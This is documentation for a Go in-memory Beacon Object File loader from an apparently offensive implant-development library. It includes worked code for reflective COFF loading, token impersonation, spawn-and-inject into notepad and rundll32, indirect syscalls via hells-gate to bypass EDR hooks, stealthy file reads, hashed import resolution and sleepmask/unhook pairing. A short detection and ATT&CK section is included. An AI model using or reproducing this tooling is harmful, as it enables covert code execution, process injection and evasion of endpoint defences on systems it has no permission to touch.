BOF (Beacon Object File) loader
TL;DR
You have a .o file (compiled C object) — typically a public
BOF from TrustedSec / Outflank / FortyNorth (whoami, situational
awareness, file ops). You want to run it inside your implant
without spawning a child process. This package loads + executes
the COFF in memory.
| You want to… | Use | Notes |
|---|---|---|
| Run a BOF from disk | Run | Loads .o, parses COFF, resolves Beacon API, executes |
| Run a BOF from memory | RunBytes | When the BOF was decrypted in-process and never landed on disk |
Pass arguments to the BOF (parsed via BeaconData*) | Config.Args | Variadic — the BOF's BeaconDataInt / BeaconDataPtr etc. consume them |
What this DOES achieve:
- Public BOFs (TrustedSec/CS-Situational-Awareness-BOF, TrustedSec/CS-Remote-OPs-BOF, Outflank/C2-Tool-Collection) run unmodified.
- Beacon API stubs implemented in Go — no Cobalt Strike needed on the operator side.
- Dynamic imports (
KERNEL32,ADVAPI32, …) resolve through PEB + ROR13 hash, so the BOF's import table doesn't appear as plaintext strings.
What this DOES NOT achieve (out of the box):
- No ARM64. x86 and x64 are both supported (x86 via the
cross-process loader under
-tags=bof_x86_loader, see below). - In-process by default — crash in the BOF kills the implant.
The default
Executepath runs the BOF on the host's OS thread with no isolation. Opt in toSetSacrificialThreadto spawn a dedicated thread with a VEH that turns BOF-mapping faults into a recoverable Goerror. - AMSI / ETW telemetry from the BOF still fires — pair
with
evasion/preset.StealthbeforeRun.
Primer
A BOF is a relocatable COFF (.o) object compiled by MSVC /
MinGW. The format is the same as Linux's .o but for Windows
PE-style relocations. BOFs were popularised by Cobalt Strike's
inline-execute command — a tactical execution primitive that
runs a small piece of native code inside the implant's process
without spawning a fresh process or writing a PE to disk.
Use cases:
- Run small Windows-API-heavy snippets (token enum, share enum, share scan) that don't need a full PE infrastructure.
- Distribute compiled techniques as a
.oartefact rather than a full implant. - Compose with the implant's runtime — the BOF runs in the caller's address space, so it can interact with implant state directly.
How It Works
flowchart LR
INPUT[BOF .o bytes] --> PARSE[parse COFF<br>header + sections]
PARSE --> ALLOC[VirtualAlloc RW<br>copy every section w/ raw data]
ALLOC --> RELOC[apply relocations<br>ADDR64 / ADDR32NB / REL32]
RELOC --> IMP[resolve __imp_*<br>PEB walk + ROR13]
IMP --> FLIP[VirtualProtect<br>exec sections → RX]
FLIP --> SEH[RtlAddFunctionTable<br>register .pdata]
SEH --> SYM[resolve entry symbol<br>from COFF symtab]
SYM --> EXEC[call entry<br>inline OR sacrificial thread]
EXEC --> OUT[capture output<br>BeaconPrintf / BeaconOutput]
API → godoc
pkg.go.dev/github.com/oioio-space/maldev/runtime/bof is the authoritative
reference for every exported symbol. This page teaches the
concepts; the godoc is the specification.
Examples
Simple — load + execute
import (
"os"
"github.com/oioio-space/maldev/runtime/bof"
)
data, _ := os.ReadFile("whoami.o")
b, err := bof.Load(data)
if err != nil {
return
}
defer b.Close()
output, _ := b.Execute(nil)
fmt.Println(string(output))
Shorter — one-shot helpers (v0.156.0+)
The same three-line pattern (Load → Execute → Close) wrapped in one call. Five helpers cover the common cases:
// 1. One-shot from bytes (embedded via go:embed, decrypted in
// memory, ...). Load + Execute + Close in one line.
out, err := bof.RunFromBytes(coffBytes, nil)
// 2. One-shot from disk. The stealthopen.Opener parameter is
// optional — nil falls back to os.Open. Pass a *Stealth /
// *MultiStealth to read the file via NTFS Object-ID and
// bypass path-based EDR file hooks.
out, err := bof.RunFromFile(nil, "whoami.o", nil)
// 3. Crash-isolated one-shot. Identical to RunFromBytes but
// spawns the entry on a sacrificial OS thread with VEH-
// mediated fault catching. Required: a non-zero timeout.
out, err := bof.RunSafe(coffBytes, args, 5*time.Second)
// 4. Pack a list of strings without the NewArgs boilerplate.
args := bof.ArgsFromStrings("target.exe", "C:\\Windows\\System32")
out, err := bof.RunFromBytes(coffBytes, args)
Prefer the long form (Load + many Execute + Close) when the
same *BOF runs many times — the prepare pass amortises across
calls. Use the helpers for genuinely one-shot workloads.
Composed — chain multiple BOFs
for _, path := range []string{"whoami.o", "netstat.o", "tasklist.o"} {
data, _ := os.ReadFile(path)
b, err := bof.Load(data)
if err != nil {
continue
}
out, _ := b.Execute(nil)
fmt.Printf("=== %s ===\n%s\n", path, out)
}
Advanced — pack arguments via Args
data, _ := os.ReadFile("parse_args.o")
b, _ := bof.Load(data)
a := bof.NewArgs()
a.AddInt(42)
a.AddString("hello-args")
out, _ := b.Execute(a.Pack())
fmt.Println(string(out))
The wire format is little-endian to match the Cobalt Strike
canonical: TrustedSec COFFLoader, Outflank etc. read length
prefixes via memcpy into a native int, which on x64 is a
little-endian load. Use AddInt / AddShort for fixed-width
ints, AddString for length-prefixed NUL-terminated strings,
AddBytes for raw blobs.
Spec.Sacrificial + Spec.Timeout — crash isolation via Run (v0.156.0+)
The Run(ctx, Spec) façade now honours the same sacrificial-thread
contract as (*BOF).SetSacrificialThread:
res, err := bof.Run(ctx, bof.Spec{
Bytes: coffBytes,
Args: args,
Sacrificial: true,
Timeout: 30 * time.Second, // mandatory when Sacrificial is set
})
Sacrificial=true without a Timeout returns ErrSacrificialNoTimeout —
the package refuses to launch a thread with no wall-clock cap (zero
to WaitForSingleObject means "wait forever" and is almost never
what an implant wants).
Architecture routing — x64 in-process, x86 cross-process (v0.155.0+)
bof.Run sniffs the COFF Machine field and dispatches: x64
runs in-process, x86 runs in a spawned SysWOW64\rundll32.exe
via the cross-process loader DLL embedded under the
bof_x86_loader build tag. Without the tag, x86 input returns
the sentinel bof.ErrCrossArchX86Unsupported so callers can
branch on architecture without parsing the file themselves.
import (
"context"
"errors"
"os"
"github.com/oioio-space/maldev/runtime/bof"
)
data, _ := os.ReadFile(bofPath)
res, err := bof.Run(context.Background(), bof.Spec{Bytes: data})
switch {
case err == nil:
// Auto-routed: x64 ran in-process, x86 ran in a WoW64 helper
// if the implant was built with `-tags=bof_x86_loader`.
fmt.Println(string(res.Output))
case errors.Is(err, bof.ErrCrossArchX86Unsupported):
// 32-bit .o detected and this implant was NOT compiled with
// `bof_x86_loader`. The build-tag gate keeps the implant
// small for missions that don't need x86 — rebuild with the
// tag (or fall back to a separate 32-bit implant) when an
// x86 BOF actually shows up in the corpus.
log.Printf("skip %s: rebuild with -tags=bof_x86_loader", bofPath)
default:
log.Printf("bof.Run failed: %v", err)
}
bof.DetectKind(data) is also exported if a caller wants to
classify the bytes without running them — handy for triage
tools that enumerate a public corpus before execution. See
runtime/bof/internal/x86loader/README.md for the x86 loader
architecture (Beacon API symbol surface, parent ↔ helper IPC,
threat model).
Token impersonation + spawn-and-inject
The slice-1 surface lets a CS BOF impersonate, spawn a sacrificial target, and inject without any extra glue:
b, _ := bof.Load(coffBytes)
b.SetSpawnTo(`C:\Windows\System32\notepad.exe`)
b.SetUserData(payloadShellcode) // optional, surfaced via BeaconGetCustomUserData
out, _ := b.Execute(nil)
// The BOF internally calls:
// BeaconUseToken(handle) → ImpersonateLoggedOnUser
// BeaconSpawnTemporaryProcess(...) → CreateProcess suspended
// BeaconInjectTemporaryProcess(...) → write + CreateRemoteThread + Resume
// BeaconRevertToken() → RevertToSelf
fmt.Println(string(out))
Execute pins the goroutine to its OS thread for the entire call, so the impersonation in step 1 is honoured by the syscalls the BOF issues in later steps.
Reuse — prepare once, run many (v0.153.0+)
A single *BOF can be Execute'd any number of times. The
expensive load work runs lazily on the first call and is cached
on the BOF; subsequent calls skip straight to the entry point.
Cost breakdown per call:
| Phase | First Execute | Subsequent Execute |
|---|---|---|
| Parse sections | ✓ | — |
| VirtualAlloc + section copy | ✓ | — |
| Resolve imports (PEB walk × N) | ✓ | — |
| Apply relocations | ✓ | — |
| VirtualProtect RW→RX | ✓ | — |
| Reset writable sections (if not persistent) | — | ✓ (cheap) |
| Call entry | ✓ | ✓ |
import "github.com/oioio-space/maldev/runtime/bof"
bytes, _ := os.ReadFile("whoami.o")
b, _ := bof.Load(bytes)
defer b.Close() // releases the cached RX mapping + .pdata unwind table
// First call: full parse + alloc + reloc + execute.
out1, _ := b.Execute(nil)
fmt.Println(string(out1))
// Second call: reuses the mapping, just re-runs the entry.
out2, _ := b.Execute(nil)
fmt.Println(string(out2))
Close() — release the cached mapping
b, _ := bof.Load(bytes)
out, _ := b.Execute(nil)
if err := b.Close(); err != nil {
log.Printf("Close: %v", err)
}
// After Close, Execute returns an error rather than crashing.
_, err := b.Execute(nil)
if err != nil {
// "runtime/bof: Execute on closed BOF"
}
Close is idempotent — multiple calls are safe. It does
two things in order: RtlDeleteFunctionTable (unregister the
.pdata unwind entries from Bundle E) then VirtualFree (drop
the RX mapping). A runtime.SetFinalizer in Load is a safety
net for callers who forget Close, but Go finalizer timing isn't
guaranteed: long-lived implants should Close explicitly to free
the mapping in a timely fashion.
SetPersistent — stateful vs stateless BOFs (v0.153.0+)
SetPersistent arbitrates whether writable sections (.data,
.bss, .rdata-with-writes) are restored between Execute
calls.
| Mode | Behaviour | Suits |
|---|---|---|
false (default) | Each Execute restores writable sections to their initial bytes | Stateless BOFs — hello_beacon, parse_args, realworld_calls, most CS-SA-BOF corpus |
true | Writable sections retain whatever the BOF wrote on the previous Execute | Stateful BOFs that intentionally cache cross-call state in .data — Fortra No-Consolation's LIBS_LOADED cache + handle-info struct |
Must be called before the first Execute — see
ErrAlreadyPrepared.
Stateless (default) — every call sees fresh memory
b, _ := bof.Load(parseArgsBytes)
defer b.Close()
// .data globals zero'd before each Execute. The BOF observes
// the same initial state on every call regardless of what
// previous calls wrote.
for _, arg := range []string{"alice", "bob", "carol"} {
a := bof.NewArgs(); a.AddString(arg)
out, _ := b.Execute(a.Pack())
fmt.Printf("%s → %s\n", arg, out)
}
Persistent — share state across Execute calls
b, _ := bof.Load(noConsolationBytes)
defer b.Close()
if err := b.SetPersistent(true); err != nil {
// SetPersistent before Execute always succeeds — error
// means the caller flipped it AFTER the first Execute,
// which is a contract violation (ErrAlreadyPrepared).
log.Fatal(err)
}
// Iteration 1: No-Consolation cold-loads all DLL dependencies,
// stores their handles in LIBS_LOADED (a .data global) via
// BeaconAddValue.
b.Execute(packArgs(pe1))
// Iteration 2: LIBS_LOADED is still warm — the BOF skips the
// LoadLibrary chain entirely.
b.Execute(packArgs(pe2))
SetPersistent after Execute → ErrAlreadyPrepared
b, _ := bof.Load(bytes)
defer b.Close()
b.Execute(nil) // runs prepare() — locks the persistence mode
if err := b.SetPersistent(true); errors.Is(err, bof.ErrAlreadyPrepared) {
// Expected: flipping the mode after prepare would leave
// the writable-section snapshots inconsistent. Decide at
// Load time which mode you want.
}
SetSacrificialThread — crash isolation (v0.154.0+)
By default a BOF runs on the same OS thread as the implant.
A wild pointer deref, stack overflow, or busted relocation
inside the BOF triggers a Windows SEH exception that
propagates through Go's runtime handler and ends in
TerminateProcess — the implant dies with the BOF.
SetSacrificialThread(timeout) enables crash isolation: the
BOF runs on a dedicated thread, a process-wide Vectored
Exception Handler intercepts faults whose address lies inside
the BOF mapping, redirects the faulting thread to an
ExitThread(1) stub, and the host Execute call returns a
clean Go error. The implant keeps running.
| Mode | When BOF AVs | Host process |
|---|---|---|
| Inline (default) | SEH → Go runtime → TerminateProcess | dies with the BOF |
Sacrificial (SetSacrificialThread > 0) | VEH catches in-mapping fault → ExitThread → host gets error | survives |
Honest limitations
- Token impersonation does not cross threads by default — use
SetExecuteAsTokento pin one.BeaconUseTokeninside the BOF impersonates on the BOF's sacrificial thread; the host goroutine keeps its original token. To start the sacrificial thread under a specific identity, call(*BOF).SetExecuteAsToken(token)beforeExecute— the loader applies it viaSetThreadTokenbetweenCreateThread(SUSPENDED)andResumeThread. BOFs that rely on chained token state across calls still need to manage the chain themselves. - Only faults inside the BOF mapping are caught. A BOF
that passes a NULL pointer to
kernel32!HeapAlloctakes the fault inside kernel32 — outside the BOF range — and still terminates the implant. The VEH range check is onExceptionAddress, not on the calling BOF. TerminateThread(used on timeout) leaks the thread's stack + any kernel objects it held. Windows-design limitation. Set timeouts generously; this is a last-resort kill, not a routine cancellation primitive.
Inline (default) — same thread, fastest
b, _ := bof.Load(coffBytes)
defer b.Close()
// SetSacrificialThread NOT called → inline path.
// If this BOF AVs, the implant dies.
out, _ := b.Execute(args)
Sacrificial — implant survives BOF crashes
b, _ := bof.Load(coffBytes)
defer b.Close()
// 5-second wall-clock cap. Zero would disable.
if err := b.SetSacrificialThread(5 * time.Second); err != nil {
log.Fatal(err) // ErrAlreadyPrepared if called after Execute
}
out, err := b.Execute(args)
switch {
case err == nil:
// Happy path — BOF returned normally.
fmt.Println(string(out))
case strings.Contains(err.Error(), "BOF crashed with exception"):
// BOF AVed / stack-overflowed / executed an illegal
// instruction inside its own mapping. Implant is still
// alive; err carries the exception code + faulting PC.
log.Printf("BOF crash isolated: %v", err)
case strings.Contains(err.Error(), "BOF timeout"):
// BOF ran longer than the timeout; the sacrificial
// thread was terminated. Output captured up to the
// timeout is in `out`.
log.Printf("BOF timeout, partial output: %s", out)
default:
// Other Execute error — usually a Load/prepare problem
// surfaced lazily on the first call.
log.Fatal(err)
}
Mixing knobs
Every knob below is independent — pick what fits your threat model and combine freely:
b, _ := bof.Load(realworldCallsBytes)
defer b.Close()
b.SetSpawnTo(`C:\Windows\System32\notepad.exe`)
b.SetUserData(payload) // surfaced via BeaconGetCustomUserData
b.SetPersistent(false) // default — fresh .data per call
b.SetSacrificialThread(30 * time.Second) // implant survives BOF crashes
b.SetCaller(myIndirectCaller) // route BeaconInjectProcess via Nt*
b.SetExecuteAsToken(impersonationToken) // run the sacrificial thread under that token
for _, target := range targets {
out, err := b.Execute(packArgs(target))
if err != nil {
// Whatever the BOF does inside, this `err` is
// recoverable: bad BOF code, bad target, timeout.
// The implant doesn't die.
log.Printf("%s: %v", target, err)
continue
}
process(out)
}
SetCaller — route cross-process Beacon API via *wsyscall.Caller (v0.156.0+)
BeaconInjectProcess (and the spawn/inject combos that build on
it) drives three cross-process kernel32 calls: VirtualAllocEx,
WriteProcessMemory, CreateRemoteThread. By default these go
through the kernel32 wrappers; under userland-hooking EDR they
appear in the API trail. SetCaller redirects all three through
a *wsyscall.Caller so they route via NtAllocateVirtualMemory
/ NtWriteVirtualMemory / NtCreateThreadEx — direct, indirect,
hells-gate, or any combination the operator builds.
import (
"github.com/oioio-space/maldev/runtime/bof"
wsyscall "github.com/oioio-space/maldev/win/syscall"
)
// Indirect syscalls with a hells-gate-style SSN resolver.
caller := wsyscall.New(wsyscall.MethodIndirect, wsyscall.NewHellsGate())
defer caller.Close()
b, _ := bof.Load(coffBytes)
defer b.Close()
b.SetCaller(caller)
_, _ = b.Execute(args)
nil — the default — keeps the kernel32 path. The Caller's
lifetime is operator-owned: BOF.Close does NOT call
caller.Close, so the same Caller can be shared across many
BOFs and inject sites. Matches the convention used across
inject.
Scope: only the
BeaconInjectProcessprimitives route through the Caller. Dynamic imports the BOF itself resolves —__imp_KERNEL32$VirtualAlloc,__imp_ADVAPI32$OpenProcessToken,__imp_NTDLL$Nt*, etc. — are patched into the BOF's import table at prepare time as direct function addresses (PEB walk + ROR13 export match). When the BOF later issuesmov reg, [rip+slot]; call reg, it jumps straight to the resolved function and bypasses the operator's Caller entirely.For full coverage of BOF Win32 calls, clean ntdll instead: the public-corpus audit (CS-SA, 37 BOFs, 652 imports) shows 55% are kernel32/advapi32/etc. wrappers and only 0.4% are
Nt*direct — so a per-import shim would only intercept the 0.4%. The pragmatic answer isevasion/unhook: once ntdll'sNt*thunks are restored to their on-disk bytes,kernel32!VirtualAlloc→ntdll!NtAllocateVirtualMemoryinternally goes through a clean syscall stub, no hook fires. PairSetCallerwithevasion/unhookfor end-to-end bypass.See
.dev/refactor-2026/bundle-i-import-routing.mdfor the closed design discussion + corpus data.
SetExecuteAsToken — pin a token on the sacrificial thread (v0.156.0+)
Closes the historical limitation where BeaconUseToken inside
the BOF impersonated only on the sacrificial thread but
Execute started that thread under the host's primary token.
With SetExecuteAsToken, the loader applies SetThreadToken
between CreateThread(SUSPENDED) and ResumeThread — the BOF
entry runs under the supplied identity from instruction zero.
Requires SeImpersonatePrivilege (admin / service contexts by
default) or a token the caller is permitted to assign.
import (
"github.com/oioio-space/maldev/runtime/bof"
"golang.org/x/sys/windows"
)
// Duplicate the current process's primary token to an
// impersonation-grade copy with TOKEN_IMPERSONATE rights.
var primary windows.Token
_ = windows.OpenProcessToken(windows.CurrentProcess(),
windows.TOKEN_DUPLICATE|windows.TOKEN_QUERY, &primary)
defer windows.CloseHandle(windows.Handle(primary))
var dup windows.Token
_ = windows.DuplicateTokenEx(primary,
windows.TOKEN_IMPERSONATE|windows.TOKEN_QUERY,
nil,
windows.SecurityImpersonation, windows.TokenImpersonation,
&dup)
defer windows.CloseHandle(windows.Handle(dup))
b, _ := bof.Load(coffBytes)
defer b.Close()
b.SetSacrificialThread(5 * time.Second) // required — token only applies on the sacrificial path
b.SetExecuteAsToken(dup)
_, _ = b.Execute(args)
Zero — the default — keeps the host's primary token. Has no
effect on inline Execute (the host's own token always
applies on that path).
OPSEC & Detection
| Artefact | Where defenders look |
|---|---|
VirtualAlloc(RW) → VirtualProtect(RX) cycle on a single mapping (the loader pattern) | Behavioural EDR — generic reflective-loader signal even after the RWX→RX-flip mitigation. The two-syscall cadence is itself a tell |
MEM_TOP_DOWN allocation with IMAGE_SCN_MEM_EXECUTE content not backed by a loaded module | ETW Microsoft-Windows-Threat-Intelligence (TI events) |
| BOF entry-point execution from non-image memory | Defender for Endpoint MsSense |
RtlAddFunctionTable for a non-image RUNTIME_FUNCTION array (Bundle E) | Niche; few products inspect, but kernel ETW captures the kernel-side registration |
syscall.NewCallback thunk pages (≈ 28 × 4 KB at first Load) | Small VAD entries with characteristic prologue bytes — same signature any Go program with native callbacks emits |
D3FEND counters:
- D3-PA — execute-from-allocation telemetry (RX-after-flip still trips the more thorough EDRs).
- D3-FCA — YARA on the loaded bytes.
Hardening for the operator (already in the loader by default):
- RW → RX flip via
VirtualProtectafter relocations land (loader behaviour since v0.151 — no RWX is ever exposed). MEM_TOP_DOWNplacement (high-address bias reduces collision with the host's heap + the most naive low-RVA scanner rules).- Encrypt the BOF at rest via
crypto; decrypt + load + immediately re-encrypt the source buffer. - Pair with
evasion/sleepmaskfor cleartext-at-rest mitigation. - Bypass kernel32 userland hooks on the cross-process Beacon API
via
(*BOF).SetCaller.
MITRE ATT&CK
| T-ID | Name | Sub-coverage | D3FEND counter |
|---|---|---|---|
| T1059 | Command and Scripting Interpreter | partial — in-memory native code execution | D3-PA |
| T1620 | Reflective Code Loading | full — COFF reflective load | D3-FCA, D3-PA |
Limitations
-
Execute is amortised, not free (v0.153+). The first call on a
*BOFruns the full loader pass (parse +VirtualAlloc+ relocations + RW→RX flip +.pdataregistration). Subsequent calls reuse the mapping — ideal for callers likeruntime/pethat load one.oand run it many times. Caller responsibility: callClose()explicitly when done. Theruntime.SetFinalizersafety net inLoadwill eventuallyRtlDeleteFunctionTable+VirtualFree, but Go finalizer timing isn't guaranteed; long-lived implants leaking RX mappings is a real liability. -
Default Execute is stateless. Writable sections (
.data,.bss,.rdata-with-writes) are restored to their initial bytes between Execute calls. BOFs that intentionally cache state in their.data(No-Consolation'sLIBS_LOADEDcache) needSetPersistent(true)before the first Execute. -
Beacon-API surface — full 28-symbol set (slice 1, v0.151+). All
beacon.hgroups are wired:- Data parsing:
BeaconDataParse/DataInt/DataShort/DataLength/DataExtract. - Output / format:
BeaconPrintf+BeaconFormatPrintf(format string forwarded verbatim — varargs caveat below),BeaconOutput,BeaconFormatAlloc/Reset/Free/Append/Int/ToString,BeaconErrorD/ErrorDD/ErrorNA. - Tokens:
BeaconUseToken(ImpersonateLoggedOnUser) /BeaconRevertToken(RevertToSelf). Execute pins the goroutine to its OS thread for the BOF call so the impersonation is honoured by subsequent Win32 calls; weRevertToSelfon Execute exit as a safety net. - Injection:
BeaconInjectProcess(VirtualAllocEx + WriteProcessMemory + CreateRemoteThread on a host handle),BeaconSpawnTemporaryProcess(CreateProcesssuspended on the configured SpawnTo —rundll32.exeby default),BeaconInjectTemporaryProcess(spawn + inject + resume, teardown on failure),BeaconCleanupProcess(terminate + close). - Helpers:
BeaconIsAdmin,BeaconGetCustomUserData(blob configured via(*BOF).SetUserData),toWideChar(UTF-8 → UTF-16LE, NUL-terminated). - Key-value store:
BeaconAddValue/BeaconGetValue/BeaconRemoveValue. Scope is the single Execute call — cross-Run state must go through the implant. Any unknown__imp_Beacon*import still fails at relocation time withunresolved external symbol __imp_BeaconXxx— loud and traceable rather than silent NULL-patching.
- Data parsing:
-
BeaconFormatAlloc buffers live one Execute call. Slices produced by
BeaconFormatAllocare held on the*BOF(per-instance map, not a process-global).BeaconFormatFreedrops the entry; whatever the BOF forgets to free is reclaimed automatically when the nextExecutestarts and onClose(). A BOF that crashes mid-call no longer leaks its format buffer for the process lifetime. -
SEH unwind via
RtlAddFunctionTable. Every COFF with a non-empty.pdatasection gets its RUNTIME_FUNCTION entries registered with the kernel duringprepareso the OS unwinder can resolve frames inside the BOF mapping. Without this, a BOF that raises a structured exception (C++throw, compiler- emitted bounds check,RaiseException) would abort during the unwind walk — the kernel could not find a function entry for the BOF's PC. Registration is silent on failure (malformed.pdata→ the BOF still runs, just without SEH support).ClosecallsRtlDeleteFunctionTablebeforeVirtualFreeto avoid leaving dangling unwind context. -
Cross-process Beacon API routes via optional
*wsyscall.Caller.BeaconInjectProcessand the spawn/inject combos useVirtualAllocEx+WriteProcessMemory+CreateRemoteThreadby default. Operators that need to bypass userland hooks on these kernel32 surfaces call(*BOF).SetCallerwith any*wsyscall.Caller(direct / indirect / indirect-asm / hells-gate). The helpers (beaconRemoteAlloc,beaconRemoteWrite,beaconRemoteCreateThread) then route throughNtAllocateVirtualMemory/NtWriteVirtualMemory/NtCreateThreadEx. nil Caller keeps the kernel32 path — matches the convention used acrossinject. -
Pointer-safety probes on
%s/ Beacon string reads.BeaconPrintf("%s", p)(and any callback that dereferences a BOF-suppliedchar*/wchar_t*) routes throughwin/api.CStringFromPtrandwin/api.WStringFromPtr. Both callVirtualQueryonce to clamp the walk to the committed region containing the pointer, so a malformed, freed, or guard-page-crossing pointer returns""instead of faulting the host. The wide-string heuristic inexpandCFormatshares the same probe viaSafeRegionBytes. -
BeaconPrintf/BeaconFormatPrintfvarargs are not expanded.syscall.NewCallbackbinds a fixed-arity Go function as a stdcall callback; Go cannot introspect cdecl varargs from inside the callback. We chose option (a) in the design discussion: forward the format string verbatim. BOFs that pass a literal format with no%directives behave correctly; BOFs relying onprintf-style expansion see the format string raw.Two alternatives were considered and rejected for the default build:
-
(b) Leave
__imp_BeaconPrintf/BeaconFormatPrintfunresolved so BOFs that depend on varargs fail at load time with a loud error. Honest but breaks compatibility with the large TrustedSec / Outflank corpus whereBeaconPrintf(CALLBACK_OUTPUT, "...")is used as a no-args writer in 80% of cases. -
(c) Implement varargs via cgo. A C wrapper around
vsnprintfwould expand the format and call back into Go with the rendered string. Requires:- A C cross-compile toolchain in the build environment (mingw-w64 on Linux dev hosts, MSVC on Windows CI).
- CGO_ENABLED=1 — flips the entire library out of pure-Go mode, which the README sells as a hard guarantee.
- A different binary surface in
runtime/boffor cgo vs. pure-Go builds, plus a build-tag matrix.
The cost is steep relative to the gain (a minority of BOFs). Operators who need full vararg expansion can fork the package, drop a
bof_cgo_windows.gofile behind//go:build windows && cgo && bof_cgo, and supply a C-sidevsnprintfwrapper they register via a hook hung offresolveBeaconImport. That extension point is intentionally left open; the default build prioritises pure-Go and accepts the verbatim-format trade-off.
-
-
External Win32 imports — two forms supported. CS-canonical dollar-form (
__imp_KERNEL32$LoadLibraryA) resolves viaparseDollarImport→api.ResolveByHash(PEB walk + ROR13 module/function hash, noGetProcAddress/LoadLibrarycall appears in the API trail). Mingw-w64 bare form (__imp_LoadLibraryAwith no DLL prefix) resolves by walking a curated module list — kernel32, advapi32, user32, ws2_32, ole32, shell32 — first hit wins. Symbols not in the curated set still fail loudly. Add a module tobareImportSearchOrderinbeacon_api_windows.goif a particular BOF needs more coverage. -
Concurrency: BOF execution is serialised package-wide. The Beacon API stubs read a single
currentBOFpointer guarded bybofMu. ConcurrentExecutecalls — including across different*BOFinstances — block on each other. This matches the CS-compatible loader convention (BOF execution is fundamentally single-threaded) and keeps the Beacon callback state coherent without per-call dispatch. Implications:- Setters (
SetUserData,SetSpawnTo,SetSpawnToX86,SetCaller,SetExecuteAsToken,SetPersistent,SetSacrificialThread) are NOT lock-protected. They are safe to call before the firstExecuteor betweenExecutecalls; calling them from a host goroutine while a sacrificial-thread Execute is in flight is a race the package does not currently guard against. Until a per-BOF mutex lands, callers that need to mutate state mid-flight should drive each BOF from a single goroutine. Errors()afterClose()returns the FINAL Execute's buffer, not nil. The byte buffer is not zeroed at teardown — post-mortem inspection works.syscall.NewCallbackcost at first Load. Resolving the Beacon import map allocates one RX page per callback (~28 symbols on the default build → ≈112 KB of RX pages), via Go's runtime. Pages live for the process lifetime and show up as small VAD entries with the syscall thunk pattern. Identical to every Go program that usessyscall.NewCallback.
- Setters (
-
x86 BOFs supported via cross-process reflective load (
-tags=bof_x86_loader, v0.155.0+). An x86.o(Machine == 0x014c) is detected asKindCOFFx86byDetectKindand routed through thecoffX86Loader. With thebof_x86_loaderbuild tag active, the orchestrator manually reflective-loads a small i386 DLL (runtime/bof/internal/x86loader/bof_x86_loader.x86.dll, ~11 KB) into a freshly-spawnedSysWOW64\rundll32.exevia VirtualAllocEx + WriteProcessMemory + .reloc application + CreateRemoteThread. The loader DLL parses the BOF.oinside the WoW64 helper, implements 25 Beacon API symbols (full beacon.h Groups 1–6 +BeaconGetOutputData+ the four Inject/Spawn process-control entries), and writes captured output into a parent-allocated RW region the parentReadProcessMemory's back. Zero disk artefacts, zeroLoadLibrarycall on the loader. Default builds (no tag) surfacebof.ErrCrossArchX86Unsupported— operatorserrors.Isagainst it. Seeruntime/bof/internal/x86loader/README.mdfor the architecture diagram, ABI, and threat-model notes. -
Relocation coverage.
IMAGE_REL_AMD64_ABSOLUTE(no-op),_ADDR64,_ADDR32(errors out cleanly when target exceeds 32-bit range),_ADDR32NB,_REL32, and the_REL32_1through_REL32_5bias variants. Exotic relocations (TLS, GOT,_SECTION,_SECREL) are not supported — the loader fails withunsupported relocation type: 0xNNso the failure mode is obvious instead of a silent corruption. -
No RWX is exposed. The loader allocates
PAGE_READWRITEthen flips exec sections toPAGE_EXECUTE_READafter relocations land. Hardened EDRs still flag theVirtualAlloc→VirtualProtect(EXECUTE)cadence on a fresh mapping — pair withevasion/sleepmaskto hide the mapping at rest.
See also
runtime/clr— sibling reflective runtime (.NET).crypto— encrypt BOF at rest.evasion/sleepmask— hide BOF bytes at rest.- Operator path.
- Detection eng path.